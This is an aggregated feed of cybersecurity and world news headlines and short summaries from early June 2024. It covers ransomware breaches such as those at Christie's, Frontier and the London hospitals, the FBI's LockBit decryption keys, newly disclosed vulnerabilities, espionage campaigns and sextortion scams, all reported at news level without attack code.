          Auction house Christie’s revealed that the data breach caused by the recent ransomware attack impacted 45,000 individuals. At the end of May, the auction house Christie’s disclosed a data breach after the ransomware group RansomHub threatened to leak stolen data. The security breach occurred in early May and the website of the auction house was unreachable after […]

          Autosummary: “The investigation revealed an unauthorized actor accessed some of our systems and certain files stored therein between May 8, 2024, and May 9, 2024, and some files were copied from those systems on May 9, 2024,” reads the letter.


          Cylance confirms data breach linked to "third-party" platform

          financial
          2024-06-10 https://www.bleepingcomputer.com/news/security/cylance-confirms-data-breach-linked-to-third-party-platform/
          Cybersecurity company Cylance confirmed the legitimacy of data being sold on a hacking forum, stating that it is old data stolen from a "third-party platform." [...]

          Autosummary: UNC5537 Snowflake attack timeline (Mandiant). While Mandiant has not shared much information about UNC5537, BleepingComputer has learned they are part of a larger community of threat actors who frequent the same websites, Telegram, and Discord servers, where they commonly collaborate on attacks. "The impacted accounts were not configured with multi-factor authentication enabled, meaning successful authentication only required a valid username and password," Mandiant said.


          Arm warns of actively exploited flaw in Mali GPU kernel drivers

          exploits Linux
          2024-06-10 https://www.bleepingcomputer.com/news/security/arm-warns-of-actively-exploited-flaw-in-mali-gpu-kernel-drivers/
          Arm has issued a security bulletin warning of a memory-related vulnerability in Bifrost and Valhall GPU kernel drivers that is being exploited in the wild. [...]

          Autosummary: Bifrost-based Mali GPUs are used in smartphones/tablets (G31, G51, G52, G71, and G76), single-board computers, Chromebooks, and various embedded systems.


          UK NHS call for O-type blood donations following ransomware attack on London hospitals

          exploits ransomware
          2024-06-10 https://securityaffairs.com/164386/cyber-crime/uk-nhs-blood-donations-ransomware-attack-london-hospitals.html
          The UK NHS issued an urgent call for O-type blood donations following the recent ransomware attack that hit several London hospitals. The UK National Health Service (NHS) issued an urgent call for O-type blood donations due to the recent ransomware attack on Synnovis that disrupted operations at several healthcare organizations in London. In early June, […]

          Autosummary: “England’s top doctor has today (Monday 10 June) backed calls from NHS Blood and Transplant (NHSBT) for O Positive and O Negative blood donors to urgently book appointments to donate in one of the 25 town and city centre NHS Blood Donor Centres in England, to boost stocks of O type blood following the cyber incident in London.”


          WeLiveSecurity wins Best Cybersecurity Vendor Blog award!

          ciber
          2024-06-10 https://www.welivesecurity.com/en/cybersecurity/welivesecurity-wins-best-cybersecurity-vendor-blog/
          The award is an excellent opportunity for us to thank our readers and to recognize the depth of talent of ESET’s security researchers and writers.



          Dead in 6 hours: How Nigerian sextortion scammers targeted my son

          financial
          2024-06-09 https://www.bbc.com/news/articles/c2llzppyx05o
          Jenn Buta has been campaigning since her son was targeted by sextortionists in Nigeria - a hotspot for scammers.

          Autosummary: By Joe Tidy, Cyber correspondent, BBC World Service. Sextortion is the fastest-growing scam affecting teenagers globally and has been linked to more than 27 suicides in the US alone. It was less than six hours from the time Jordan started communicating until the time he ultimately took his life. The NCCC director pointed to the fact that the government has spent millions of pounds on a state-of-the-art cyber-crime centre, to show it was taking cyber-crime seriously, especially sextortion. (Photo caption: Samuel, 22, and Samson Ogoshi, 20, arrested in Lagos, are awaiting sentencing in the US.)


          Week in review: Atlassian Confluence RCE PoC, new Kali Linux, Patch Tuesday forecast

          Linux
          2024-06-09 https://www.helpnetsecurity.com/2024/06/09/week-in-review-atlassian-confluence-rce-poc-new-kali-linux-patch-tuesday-forecast/

          Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: High-risk Atlassian Confluence RCE fixed, PoC available (CVE-2024-21683) If you’re self-hosting an Atlassian Confluence Server or Data Center installation, you should upgrade to the latest available version to fix a high-severity RCE flaw (CVE-2024-21683) for which a PoC and technical details are already public. Kali Linux 2024.2 released: 18 new tools, countless updates Kali Linux 2024.2 is now available. It … More

          The post Week in review: Atlassian Confluence RCE PoC, new Kali Linux, Patch Tuesday forecast appeared first on Help Net Security.


          Autosummary: Infosec products of the month: May 2024. Here’s a look at the most interesting products from the past month, featuring releases from: Abnormal Security, Adaptive Shield, Appdome, AuditBoard, Calix, Cranium, CyberArk, Cybersixgill, Dashlane, Datadog, Detectify, Eclypsium, ExtraHop, FireMon, Forcepoint, ManageEngine, OneTrust, OWASP Foundation, PlexTrac, Proofpoint, Secure Code Warrior, SentinelOne, Snyk, Splunk, Strike Graph, Sumo Logic, Synopsys, Trellix, and Truecaller. New infosec products of the week: June 7, 2024. Here’s a look at the most interesting products from the past week, featuring releases from Appdome, SailPoint, Tines, Trend Micro, Verimatrix, and Zyxel Networks.


          Brazil to ask Argentina to extradite alleged rioters

          latam industry
          2024-06-08 https://www.bbc.com/news/articles/c2vv504qj13o
          The riots were led by supporters of former right-wing President Jair Bolsonaro in January 2023.



          New PHP Vulnerability Exposes Windows Servers to Remote Code Execution

          exploits
          2024-06-08 https://thehackernews.com/2024/06/new-php-vulnerability-exposes-windows.html
          Details have emerged about a new critical security flaw impacting PHP that could be exploited to achieve remote code execution under certain circumstances. The vulnerability, tracked as CVE-2024-4577, has been described as a CGI argument injection vulnerability affecting all versions of PHP installed on the Windows operating system. According to DEVCORE security researcher, the shortcoming makes



          FBI Distributes 7,000 LockBit Ransomware Decryption Keys to Help Victims

          exploits ransomware
          2024-06-07 https://thehackernews.com/2024/06/fbi-distributes-7000-lockbit-ransomware.html
          The U.S. Federal Bureau of Investigation (FBI) has disclosed that it’s in possession of more than 7,000 decryption keys associated with the LockBit ransomware operation to help victims get their data back at no cost. "We are reaching out to known LockBit victims and encouraging anyone who suspects they were a victim to visit our Internet Crime Complaint Center at ic3.gov," FBI Cyber Division

          Autosummary: According to the Veeam Ransomware Trends Report 2024, which is based on a survey of 1,200 security professionals, organizations experiencing a ransomware attack can recover, on average, only 57% of the compromised data, leaving them vulnerable to "substantial data loss and negative business impact."


          SPECTR Malware Targets Ukraine Defense Forces in SickSync Campaign

          exploits
          2024-06-07 https://thehackernews.com/2024/06/spectr-malware-targets-ukraine-defense.html
          The Computer Emergency Response Team of Ukraine (CERT-UA) has warned of cyber attacks targeting defense forces in the country with a malware called SPECTR as part of an espionage campaign dubbed SickSync. The agency attributed the attacks to a threat actor it tracks under the moniker UAC-0020, which is also called Vermin and is assessed to be associated with security agencies of the Luhansk "

          Autosummary: "At the same time, to upload stolen documents, files, passwords and other information from the computer, the standard synchronization functionality of the legitimate SyncThing software was used, which, among other things, supports the establishment of a peer-to-peer connection between computers," CERT-UA said.


          UAC-0020 threat actor used the SPECTR Malware to target Ukraine’s defense forces

          exploits
          2024-06-07 https://securityaffairs.com/164250/intelligence/spectr-malware-used-in-sicksync-campaign.html
          Ukraine’s CERT-UA warned of cyber attacks targeting defense forces with SPECTR malware as part of a cyber espionage campaign dubbed SickSync. The Computer Emergency Response Team of Ukraine (CERT-UA) warned of a cyber espionage campaign targeting defense forces in the country. The Ukrainian CERT attributes the attack to the threat actor UAC-0020, which employed a malware […]



          Chinese threat actor exploits old ThinkPHP flaws since October 2023

          exploits
          2024-06-07 https://securityaffairs.com/164239/hacking/hackers-exploits-old-thinkphp-flaws.html
          Akamai observed a Chinese-speaking group exploiting two flaws, tracked as CVE-2018-20062 and CVE-2019-9082, in ThinkPHP applications. Akamai researchers observed a Chinese threat actor exploiting two old remote code execution vulnerabilities, tracked as CVE-2018-20062 and CVE-2019-9082, in ThinkPHP. The campaign seems to have been active since at least October 2023; it initially targeted a limited number of customers/organizations […]

          Autosummary: “The web shell demonstrates advanced capabilities, such as navigating the file system, which enables operations like file editing, deletion, and timestamp modification for obfuscation purposes,” continues the analysis.


          Christie’s starts notifying clients of RansomHub data breach

          financial
          2024-06-07 https://www.bleepingcomputer.com/news/security/christies-starts-notifying-clients-of-ransomhub-data-breach/
          British auction house Christie’s is notifying individuals whose data was stolen by the RansomHub ransomware gang in a recent network breach. [...]

          Autosummary: Claimed by RansomHub: While Christie’s didn’t name the attackers behind the May breach, the RansomHub gang added the auction house to its dark web leak portal, claiming it had breached its systems and stolen sensitive client data.


          Frontier warns 750,000 of a data breach after extortion threats

          financial
          2024-06-07 https://www.bleepingcomputer.com/news/security/frontier-warns-750-000-of-a-data-breach-after-extorted-by-ransomhub/
          Frontier Communications is warning 750,000 customers that their information was exposed in a data breach after an April cyberattack claimed by the RansomHub ransomware operation. [...]

          Autosummary: A screenshot (redacted in the original article) contains customer information, such as full name, date of birth, physical address, social security number, email address, subscription status, and service notes.


          SolarWinds fixes severe Serv-U vulnerability (CVE-2024-28995)

          exploits
          2024-06-07 https://www.helpnetsecurity.com/2024/06/07/cve-2024-28995/

          SolarWinds has fixed a high-severity vulnerability (CVE-2024-28995) affecting its Serv-U managed file transfer (MFT) server solution, which could be exploited by unauthenticated attackers to access sensitive files on the host machine. About CVE-2024-28995: Serv-U MFT Server is a widely used enterprise solution that provides secure file transfer and file sharing hosted on Windows and Linux machines. Discovered and reported by Hussein Daher, CVE-2024-28995 is a directory traversal (aka path traversal) vulnerability that affects SolarWinds Serv-U … More

          The post SolarWinds fixes severe Serv-U vulnerability (CVE-2024-28995) appeared first on Help Net Security.




          Frontier warns 750,000 of a data breach after extortion threats

          financial
          2024-06-07 https://www.bleepingcomputer.com/news/security/frontier-warns-750-000-of-a-data-breach-after-extortion-threats/
          Frontier Communications is warning 750,000 customers that their information was exposed in a data breach after an April cyberattack claimed by the RansomHub ransomware operation. [...]

          Autosummary: A screenshot (redacted in the original article) contains customer information, such as full name, date of birth, physical address, social security number, email address, subscription status, and service notes.


          78% of SMBs fear cyberattacks could shut down their business

          ciber
          2024-06-06 https://www.helpnetsecurity.com/2024/06/06/smbs-cyberattack-frequency/

          94% of SMBs have experienced at least one cyberattack, a dramatic rise from 64% in 2019, according to ConnectWise. This increase in cyberattacks is exacerbated by the fact that 76% of SMBs lack the in-house skills to properly address security issues, increasing demand for the expertise and services of MSPs. Rising cyberattack frequency on SMBs The growing wave of cyber incidents is eroding SMBs’ confidence in their ability to protect their businesses with a staggering … More

          The post 78% of SMBs fear cyberattacks could shut down their business appeared first on Help Net Security.


          Autosummary: Conducted between March and April 2024, this research includes insights from 700 IT decision makers and business decision makers, with representation in the US, Canada, UK, and Australia and New Zealand.


          Chinese attackers leverage previously unseen malware for espionage

          exploits
          2024-06-06 https://www.helpnetsecurity.com/2024/06/06/chinese-state-sponsored-activity-government-target/

          Sophos released its report, “Operation Crimson Palace: Threat Hunting Unveils Multiple Clusters of Chinese State-Sponsored Activity Targeting Southeast Asia,” which details a highly sophisticated, nearly two-year long espionage campaign against a high-level government target. During Sophos X-Ops’ investigation, which began in 2023, the managed detection and response (MDR) team found three distinct clusters of activity targeting the same organization, two of which included tactics, techniques and procedures (TTPs) that overlap with well-known, Chinese nation-state groups: … More

          The post Chinese attackers leverage previously unseen malware for espionage appeared first on Help Net Security.


          Autosummary: During Sophos X-Ops’ investigation, which began in 2023, the managed detection and response (MDR) team found three distinct clusters of activity targeting the same organization, two of which included tactics, techniques and procedures (TTPs) that overlap with well-known Chinese nation-state groups: BackdoorDiplomacy, APT15 and the APT41 subgroup Earth Longzhi. “As Western governments elevate awareness about cyberthreats from China, the overlap Sophos has uncovered is an important reminder that focusing too much on any single Chinese attribution may put organizations at risk of missing trends about how these groups coordinate their operations,” said Paul Jaramillo, director, threat hunting and threat intelligence, Sophos.


          Hackers Exploit Legitimate Packer Software to Spread Malware Undetected

          exploits
          2024-06-06 https://thehackernews.com/2024/06/hackers-exploit-legitimate-packer.html
          Threat actors are increasingly abusing legitimate and commercially available packer software such as BoxedApp to evade detection and distribute malware such as remote access trojans and information stealers. "The majority of the attributed malicious samples targeted financial institutions and government industries," Check Point security researcher Jiri Vinopal said in an analysis. The volume of

          Autosummary: Among the malware families distributed in this manner are Agent Tesla, AsyncRAT, LockBit, LodaRAT, NanoCore, Neshta, NjRAT, Quasar RAT, Ramnit, RedLine, Remcos, RevengeRAT, XWorm, and ZXShell.


          FBI obtained 7,000 LockBit decryption keys, victims should contact the feds to get support

          ransomware
          2024-06-06 https://securityaffairs.com/164207/security/fbi-obtained-7000-lockbit-decryption-keys.html
          The FBI is informing victims of LockBit ransomware it has obtained over 7,000 LockBit decryption keys that could allow some of them to decrypt their data. The FBI is inviting victims of LockBit ransomware to come forward because it has obtained over 7,000 LockBit decryption keys that could allow them to recover their encrypted data […]

          Autosummary: Since January 2020, affiliates utilizing LockBit have targeted organizations of diverse sizes spanning critical infrastructure sectors such as financial services, food and agriculture, education, energy, government and emergency services, healthcare, manufacturing, and transportation. “Additionally, from our ongoing disruption of LockBit, we now have over 7,000 decryption keys and can help victims reclaim their data and get back online,” said Bryan Vorndran, the Assistant Director at the FBI Cyber Division, during the 2024 Boston Conference on Cyber Security.


          Muhstik Botnet Exploiting Apache RocketMQ Flaw to Expand DDoS Attacks

          exploits
          2024-06-06 https://thehackernews.com/2024/06/muhstik-botnet-exploiting-apache.html
          The distributed denial-of-service (DDoS) botnet known as Muhstik has been observed leveraging a now-patched security flaw impacting Apache RocketMQ to co-opt susceptible servers and expand its scale. "Muhstik is a well-known threat targeting IoT devices and Linux-based servers, notorious for its ability to infect devices and utilize them for cryptocurrency mining and launching Distributed Denial "

          Autosummary: "Muhstik is a well-known threat targeting IoT devices and Linux-based servers, notorious for its ability to infect devices and utilize them for cryptocurrency mining and launching Distributed Denial of Service (DDoS) attacks," cloud security firm Aqua said in a report published this week.


          Colombian government sets peace talks date with rebels

          latam government
          2024-06-06 https://www.bbc.com/news/articles/cqqq9v1kvego
          Formal peace talks between the Second Marquetalia and the government will start on 25 June.

          Autosummary: By Vanessa Buschschlüter, BBC News. Colombia’s government and a group of left-wing rebels have said they will begin formal peace talks later this month. (Photo caption: Cuba, which is one of the guarantor nations in the peace talks, tweeted a group photo.)


          Man in Mexico dies with first human case of H5N2 bird flu

          latam
          2024-06-06 https://www.bbc.com/news/articles/cneejz1kdzmo
          Mexico reports the death of a man from a strain of bird flu not seen in humans before.



          New Fog ransomware targets US education sector via breached VPNs

          exploits ransomware
          2024-06-06 https://www.bleepingcomputer.com/news/security/new-fog-ransomware-targets-us-education-sector-via-breached-vpns/
          A new ransomware operation named "Fog" launched in early May 2024, using compromised VPN credentials to breach the networks of educational organizations in the U.S. [...]

          Autosummary: Once they gain access to the internal network, the attackers perform "pass-the-hash" attacks on administrator accounts, which are used to establish RDP connections to Windows servers running Hyper-V. Alternatively, credential stuffing is used to hijack valuable accounts, followed by PsExec deployment on multiple hosts.


          Hit by LockBit? The FBI is waiting to help you with over 7,000 decryption keys

          ransomware
          2024-06-06 https://www.tripwire.com/state-of-security/hit-lockbit-fbi-waiting-help-you-over-7000-decryption-keys
          Did your company fall victim to the LockBit ransomware? Have cybercriminals left gigabytes of your data encrypted, with no easy route for recovery that doesn't involve paying a ransom? Well, don't fear... Read more in my article on the Tripwire State of Security blog.

          Autosummary: Vorndran described how LockBit was set up and administered by a 31-year-old Russian called Dmitry Khoroshev (who used online handles such as "LockBitsupp," "Putinkrab," and "Nerowolfe"), who receives a 20% cut of whatever payments are extorted from the ransomware's innocent victims.


          A new Linux version of TargetCompany ransomware targets VMware ESXi environments

          exploits ransomware Linux
          2024-06-06 https://securityaffairs.com/164219/cyber-crime/linux-version-targetcompany-ransomware.html
          A new Linux variant of the TargetCompany ransomware family targets VMware ESXi environments using a custom shell script. A new variant of the TargetCompany ransomware group uses a custom shell script as a means of payload delivery and execution; this is the first time the technique has been observed in the wild. The script was also used […]

          Autosummary: Pierluigi Paganini, June 06, 2024. A new Linux variant of the TargetCompany ransomware family targets VMware ESXi environments using a custom shell script.


          Hackers exploit 2018 ThinkPHP flaws to install ‘Dama’ web shells

          exploits
          2024-06-06 https://www.bleepingcomputer.com/news/security/hackers-exploit-2018-thinkphp-flaws-to-install-dama-web-shells/
          Chinese threat actors are targeting ThinkPHP applications vulnerable to CVE-2018-20062 and CVE-2019-9082 to install a persistent web shell named Dama. [...]

          Autosummary: Specifically, the attackers exploit the bugs to download a text file named "public.txt," which, in reality, is the obfuscated Dama web shell saved as "roeter.php."


          The job hunter’s guide: Separating genuine offers from scams

          financial
          2024-06-06 https://www.welivesecurity.com/en/scams/the-job-hunters-guide-separating-genuine-offers-from-scams/
          $90,000/year, full home office, and 30 days of paid leave, and all for a job as a junior data analyst – unbelievable, right? This and many other job offers are fake though – made just to ensnare unsuspecting victims into giving up their data.

          Autosummary: If they have reactions from real people, recommendations from previous employers and colleagues, certifications, genuine reactions of their own on the posts of others, etc. So, to confirm whether you are about to interact with a genuine offer, your best bet is to check: whether the company and person exist – legal business name, address, registration, online presence, and potential news reports. On the other hand, with OSINT tools, people can check how exposed they are online, so they also have a positive application, especially for security practitioners, who can use them to uncover information about potential threats that can upset the security postures of those they protect.


          Cybersecurity jobs available right now: June 5, 2024

          ciber
          2024-06-05 https://www.helpnetsecurity.com/2024/06/05/cybersecurity-jobs-available-right-now-june-5-2024/

          Corporate Data Protection Manager GLS | Germany | Hybrid – View job details As a Corporate Data Protection Manager, you will develop the Corporate Data Protection Framework with a special focus on compliance with the EU General Data Protection Regulation. Develop projects and processes to strengthen data protection in the international GLS organization and guide the country data protection functions in their implementation. Design and implement data protection guidance, trainings and other awareness measures. Cyber … More

          The post Cybersecurity jobs available right now: June 5, 2024 appeared first on Help Net Security.


          Autosummary: Senior Cybersecurity Assurance Analyst-RedTeam Ops Emirates | UAE | On-site – View job details As a Senior Cybersecurity Assurance Analyst-RedTeam Ops, you will develop, implement, lead, and continuously improve the security verification and testing processes consisting of but not limited to risk assessments, compliance reviews, vulnerability assessments and penetration tests based on industry best practices and as defined by the assurance. Logging & Asset Management Specialist – USDS TikTok | Australia | On-site – View job details As a Logging and Analytics Platform Operations Specialist, you will be responsible for supporting the Logging and Analytics Platform Operations Lead and cross-functional partners in deploying, integrating, and managing technologies to support the security and protection of data in accordance with relevant geographical regulations, contractual commitments, and confidentiality requirements. SOC Engineer ZeroTrust | Indonesia | Hybrid – View job details The SOC Engineer will be responsible for performing day-to-day tasks such as monitoring, analyzing, and responding to security incidents, managing security tools and technologies, conducting security assessments, and implementing security measures.


          Rebranded Knight Ransomware Targeting Healthcare and Businesses Worldwide

          exploits ransomware
          2024-06-05 https://thehackernews.com/2024/06/rebranded-knight-ransomware-targeting.html
          An analysis of a nascent ransomware strain called RansomHub has revealed it to be an updated and rebranded version of Knight ransomware, itself an evolution of another ransomware known as Cyclops. Knight (aka Cyclops 2.0) ransomware first arrived in May 2023, employing double extortion tactics to steal and encrypt victims' data for financial gain. It's operational across multiple platforms,

          Autosummary: "This threat actor has an extensive understanding of the VBScript language, and Windows internals and utilities, such as WMI, diskpart, and bcdboot," Kaspersky said in its analysis of ShrinkLocker, noting that they likely "already had full control of the target system when the script was executed."


          RansomHub extortion gang linked to now-defunct Knight ransomware

          exploits ransomware
          2024-06-05 https://www.bleepingcomputer.com/news/security/ransomhub-extortion-gang-linked-to-now-defunct-knight-ransomware/
          Security researchers analyzing the relatively new RansomHub ransomware-as-a-service believe that it has evolved from the currently defunct Knight ransomware project. [...]

          Autosummary: Knight ransomware sale post on RAMP forums (source: KELA). Malware analysts at Symantec, part of Broadcom, found multiple similarities between the two ransomware families that point to a common origin: both ransomware families are written in Go and use Gobfuscate for obfuscation.


          Financial sextortion scams on the rise

          financial
          2024-06-05 https://www.malwarebytes.com/blog/news/2024/06/financial-sextortion-scams-on-the-rise
          Financially motivated sextortion of teenage boys is the fastest-growing global cybercrime, according to the FBI and Homeland Security.

          Autosummary: Remind them to be selective about what they share online and who they connect with, and if a stranger reaches out to them demanding payment or sexually explicit images, they should speak to a trusted adult before sending anything, be it money, photos, or more messages. Scammers then threaten victims into sending payment, usually in the form of cryptocurrency, wire transfer, or gift cards, otherwise they’ll post the images online for all to see. Financial sextortion happens when adult criminals create fake accounts posing as young women on social media, gaming platforms, or messaging apps, and coerce victims into sending explicit photos.


          Say hello to the fifth generation of Malwarebytes

          exploits
          2024-06-05 https://www.malwarebytes.com/blog/personal/2024/06/say-hello-to-the-fifth-generation-of-malwarebytes
          Announcing the latest version of Malwarebytes, which brings a faster, responsive, and consistent user interface, integrated security and privacy, and expert guidance to keep you secure.

          Autosummary: In our recent report, “Everyone’s afraid of the internet, and no one’s sure what to do about it,” we found that only half of the people surveyed felt confident they knew how to stay safe online, and even fewer said they were taking the right measures to protect themselves.


          Chinese State-Backed Cyber Espionage Targets Southeast Asian Government

          government
          2024-06-05 https://thehackernews.com/2024/06/chinese-state-backed-cyber-espionage.html
          An unnamed high-profile government organization in Southeast Asia emerged as the target of a "complex, long-running" Chinese state-sponsored cyber espionage operation codenamed Crimson Palace. "The overall goal behind the campaign was to maintain access to the target network for cyberespionage in support of Chinese state interests," Sophos researchers Paul Jaramillo, Morgan Demboski, Sean

          Autosummary: Crimson Palace comprises three intrusion clusters, some of which share the same tactics, although there is evidence of older activity dating back to March 2022: Cluster Alpha (March 2023 - August 2023), which exhibits some degree of similarity with actors tracked as BackdoorDiplomacy, REF5961, Worok, and TA428; Cluster Bravo (March 2023), which has commonalities with Unfading Sea Haze; and Cluster Charlie (March 2023 - April 2024), which has overlaps with Earth Longzhi, a subgroup within APT41. Sophos assessed that these overlapping activity clusters were likely part of a coordinated campaign orchestrated under the direction of a single organization.


          Cisco addressed Webex flaws used to compromise German government meetings

          government
          2024-06-05 https://securityaffairs.com/164173/breaking-news/cisco-webex-flaws-german-government-meetings.html
          Cisco addressed vulnerabilities that were exploited to compromise the Webex meetings of the German government. In early May, German media outlet Zeit Online revealed that threat actors exploited vulnerabilities in the German government’s implementation of the Cisco Webex software to access internal meetings. In March, the German authorities admitted the hack by Russia-linked actors of […]



          Qilin ransomware gang linked to attack on London hospitals

          exploits ransomware
          2024-06-05 https://www.bleepingcomputer.com/news/security/qilin-ransomware-gang-linked-to-attack-on-london-hospitals/
          A ransomware attack that hit pathology services provider Synnovis on Monday and impacted several major NHS hospitals in London has now been linked to the Qilin ransomware operation. [...]

          Autosummary: Ciaran Martin, the inaugural CEO of the UK's National Cyber Security Centre (NCSC), said today that the Qilin gang is likely responsible for the incident. The attack has resulted in Synnovis being locked out of its systems and is causing ongoing service disruptions at Guy's and St Thomas' NHS Foundation Trust, King's College Hospital NHS Foundation Trust, and various primary care providers across south east London.


          Kali Linux 2024.2 released with 18 new tools, Y2038 changes

          Linux
          2024-06-05 https://www.bleepingcomputer.com/news/linux/kali-linux-20242-released-with-18-new-tools-y2038-changes/
          Kali Linux has released version 2024.2, the first version of 2024, with eighteen new tools and fixes for the Y2038 bug. [...]

          Autosummary: Kali 2024.2 doesn't disappoint, with eighteen new tools added in this release: autorecon - Multi-threaded network reconnaissance tool; coercer - Automatically coerce a Windows server to authenticate on an arbitrary machine; dploot - Python rewrite of SharpDPAPI; getsploit - Command line utility for searching and downloading exploits; gowitness - Web screenshot utility using Chrome Headless; horst - Highly Optimized Radio Scanning Tool; ligolo-ng - Advanced, yet simple, tunneling/pivoting tool that uses a TUN interface; mitm6 - pwning IPv4 via IPv6; netexec - Network service exploitation tool that helps automate assessing the security of large networks.


          Vulnerability in Cisco Webex cloud service exposed government authorities, companies

          exploits government
          2024-06-05 https://www.helpnetsecurity.com/2024/06/05/cisco-webex-cloud-vulnerability/

          The vulnerability that allowed a German journalist to discover links to video conference meetings held by Bundeswehr (the German armed forces) and the Social Democratic Party of Germany (SPD) via their self-hosted Cisco Webex instances similarly affected the Webex cloud service. The Cisco Webex Meetings cloud vulnerability: the vulnerability affected all organizations “that have a domain such as organisationsname.webex.com,” according to Netzbegrünung, an association that organizes the digital infrastructure for Bündnis 90/Die Grünen (a German … More


          Autosummary: Discovered by Netzbegrünung and verified by Eva Wolfangel with ZEIT Online, the bug allowed the discovery of information about past and future Webex meetings involving the country’s Federal Office for Information Security (BSI), the Bundestag (i.e., the parliament), various ministries, the Federal Chancellery, and other federal and state offices, as well as authorities and companies – big and small – in Germany, the Netherlands, Italy, Austria, France, Switzerland, Ireland and Denmark. Unlike the Bundeswehr and the SPD, these organizations use Webex in the cloud, Wolfangel said.


          Kali Linux 2024.2 released: 18 new tools, countless updates

          Linux
          2024-06-05 https://www.helpnetsecurity.com/2024/06/05/kali-linux-2024-2-released/

          Kali Linux 2024.2 is now available. It includes future package compatibility for 32-bit platforms, improvements to GNOME 46 and Xfce, and 18 new tools. Desktop changes: Kali 2024.2 introduces GNOME 46, offering a refined experience that builds on the enhancements from previous versions. The Xfce desktop has undergone specific changes for Kali-Undercover and HiDPI modes. These updates improve stability and include several minor bug fixes, ensuring better support for the latest desktop features. New tools … More



          Linux version of TargetCompany ransomware focuses on VMware ESXi

          exploits ransomware Linux
          2024-06-05 https://www.bleepingcomputer.com/news/security/linux-version-of-targetcompany-ransomware-focuses-on-vmware-esxi/
          Researchers observed a new Linux variant of the TargetCompany ransomware family that targets VMware ESXi environments using a custom shell script to deliver and execute payloads. [...]

          Autosummary: Also known as Mallox, FARGO, and Tohnichi, the TargetCompany ransomware operation emerged in June 2021 and has been focusing on database attacks (MySQL, Oracle, SQL Server) against organizations mostly in Taiwan, South Korea, Thailand, and India.


          FBI recovers 7,000 LockBit keys, urges ransomware victims to reach out

          exploits ransomware
          2024-06-05 https://www.bleepingcomputer.com/news/security/fbi-recovers-7-000-lockbit-keys-urges-ransomware-victims-to-reach-out/
          The FBI urges past victims of LockBit ransomware attacks to come forward after revealing that it has obtained over 7,000 LockBit decryption keys that they can use to recover encrypted data for free. [...]



          Malware can steal data collected by the Windows Recall tool, experts warn

          exploits
          2024-06-05 https://securityaffairs.com/164181/digital-id/malware-steal-data-windows-recall-tool.html
          Cybersecurity researchers demonstrated how malware could potentially steal data collected by the new Windows Recall tool. The Recall feature of Microsoft Copilot+ is an AI-powered tool designed to help users search for past activities on their PC. The data collected by the tool is stored and processed locally. After its presentation, it raised security and […]

          Autosummary: The full OCR text with the temporarily visible password is available in the %LocalAppData%\CoreAIPlatform.00\UKP\{<UUID>}\ukg.db SQLite database, nicely gift wrapped 🎁 for infostealer malware to exfiltrate. — Marc-André Moreau (@awakecoding), June 3, 2024. While Recall remains a “preview” feature and, according to Microsoft’s small print, could change before it launches, Beaumont writes in his research that the company “should recall Recall and rework it to be the feature it deserves to be, delivered at a later date.”


          Epoch Times CFO charged in $67m money laundering plot

          financial
          2024-06-04 https://www.bbc.com/news/articles/cg66xe59zyeo
          CFO Bill Guan allegedly led a team at the news outlet that was behind a global money laundering scheme.

          Autosummary: According to the indictment, Mr Guan led the outlet's "Make Money Online" team, which used cryptocurrency to purchase tens of millions worth of crime proceeds.


          20 free cybersecurity tools you might have missed

          ciber
          2024-06-04 https://www.helpnetsecurity.com/2024/06/04/free-open-source-cybersecurity-tools/

          Free, open-source cybersecurity tools have become indispensable to protecting individuals, organizations, and critical infrastructure from cyber threats. These tools are created through collaborative and transparent efforts, making them affordable and accessible alternatives to proprietary software. Here, you will find a curated list of free cybersecurity tools you should consider. Authelia: Open-source authentication and authorization server. Authelia is an open-source authentication and authorization server that offers 2FA and SSO for applications through a web portal. It … More


          Autosummary: Protobom: Open-source software supply chain tool. Protobom is an open-source software supply chain tool that enables all organizations, including system administrators and software development communities, to read and generate Software Bill of Materials (SBOMs), file data, and translate this data across standard industry SBOM formats. Mantis: Open-source framework that automates asset discovery, reconnaissance, scanning. Mantis is an open-source command-line framework that automates asset discovery, reconnaissance, and scanning.


          Third-party vendors pose serious cybersecurity threat to national security

          ciber
          2024-06-04 https://www.helpnetsecurity.com/2024/06/04/third-party-vendors-threat-video/

          In this Help Net Security video, Paul Prudhomme, Principal Security Analyst at SecurityScorecard, discusses the findings of the 2024 Redefining Resilience: Concentrated Cyber Risk in a Global Economy Research report. This research details a surge in adversaries exploiting third-party vulnerabilities and uncovers an extreme concentration of cyber risk in just 15 vendors, posing a serious threat to national security and global economies. Key findings include: 150 companies account for 90% of the technology products and … More



          DarkGate Malware Replaces AutoIt with AutoHotkey in Latest Cyber Attacks

          exploits
          2024-06-04 https://thehackernews.com/2024/06/darkgate-malware-replaces-autoit-with.html
          Cyber attacks involving the DarkGate malware-as-a-service (MaaS) operation have shifted away from AutoIt scripts to an AutoHotkey mechanism to deliver the last stages, underscoring continued efforts on the part of the threat actors to continuously stay ahead of the detection curve. The updates have been observed in version 6 of DarkGate released in March 2024 by its developer RastaFarEye, who



          Plainsea cybersecurity platform to launch at Infosecurity Europe

          ciber
          2024-06-04 https://www.helpnetsecurity.com/2024/06/04/plainsea-cybersecurity-platform-infosecurity-europe/

          Plainsea is a cutting-edge platform set to shake up the cybersecurity scene with its European launch at Infosecurity Europe in 2024. As cyber threats continue to evolve at an alarming rate, the demand for efficient and intelligent cybersecurity solutions has never been higher. At the same time, the shortage of skilled cybersecurity experts is severe and continues to grow. That’s where Plainsea comes in. Designed with managed security service providers in mind, Plainsea offers a … More



          ManageEngine unveils passwordless, phishing-resistant FIDO2 authentication

          financial
          2024-06-04 https://www.helpnetsecurity.com/2024/06/04/manageengine-fido2-authentication/

          ManageEngine launched passwordless, phishing-resistant FIDO2 authentication for enterprise applications in ADSelfService Plus, its on-premises identity security solution, and endpoint MFA for Windows machines and elevated system actions in Identity360, its cloud-native identity management platform. Identity-first security: A significant stride towards zero trust. Attackers are ever striving to breach authentication mechanisms by stealing and misusing identities, predominantly via phishing attacks. Egress’ 2024 Email Security Risk Report states that 79% of account takeover (ATO) … More



          Hackers Use MS Excel Macro to Launch Multi-Stage Malware Attack in Ukraine

          exploits
          2024-06-04 https://thehackernews.com/2024/06/hackers-use-ms-excel-macro-to-launch.html
          A new sophisticated cyber attack has been observed targeting endpoints geolocated to Ukraine with an aim to deploy Cobalt Strike and seize control of the compromised hosts. The attack chain, per Fortinet FortiGuard Labs, involves a Microsoft Excel file that carries an embedded VBA macro to initiate the infection, "The attacker uses a multi-stage malware strategy to deliver the notorious "Cobalt

